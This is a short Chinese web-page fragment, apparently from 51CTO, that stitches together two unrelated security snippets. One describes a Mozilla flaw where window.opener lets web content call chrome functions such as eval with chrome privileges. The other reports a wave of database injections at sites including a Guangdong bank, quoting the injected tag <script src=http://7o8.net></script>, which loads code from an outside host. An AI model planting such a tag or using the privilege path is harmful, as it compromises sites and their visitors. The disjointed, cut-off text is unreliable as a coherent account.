chrome窗口所打开的内容窗口通过window.opener属性保持对chrome窗口的引用。使用这个引用,新窗口中的内容就可以访问chrome窗口中的函数,如eval,并使用这些函数以chrome权限执行任意JavaScript代码。在常见的Mozilla浏览器中攻击者无法导致出现这些应用对话框,也无法利用这个漏洞自动加载攻击代码,但有些附加组件可能以这种方式打开恶意的Web内容。
近日,Mdcsoft Security Team接到好多求救电话,12.18凌晨2点,广东某银行网络负责人致电mdcsoft寻求帮助, 最近很多站的数据库里被插入,代码: <script src=http://7o8.net></script>
Copyright © 2005-2025 51CTO.COM 版权所有 京ICP证060544号
